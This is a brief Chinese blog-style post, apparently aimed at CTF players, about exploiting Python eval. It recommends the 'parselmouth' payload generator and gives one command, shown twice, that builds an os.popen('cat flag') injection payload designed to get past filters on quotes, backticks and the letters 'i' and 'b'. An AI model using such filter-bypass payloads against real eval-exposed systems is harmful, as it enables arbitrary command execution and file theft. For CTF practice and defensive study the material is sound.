python中的eval
构造payload神器parselmouth
eg
python parselmouth.py --payload "__import__('os').popen('cat flag').read()" --rule '"' "'" '`' 'i' 'b' --specify-bypass '{"white": {"Bypass_Attribute": ["by_vars"]}}'
秋雨样 · 2024-11-30 · 次阅读
构造payload神器parselmouth
eg
python parselmouth.py --payload "__import__('os').popen('cat flag').read()" --rule '"' "'" '`' 'i' 'b' --specify-bypass '{"white": {"Bypass_Attribute": ["by_vars"]}}'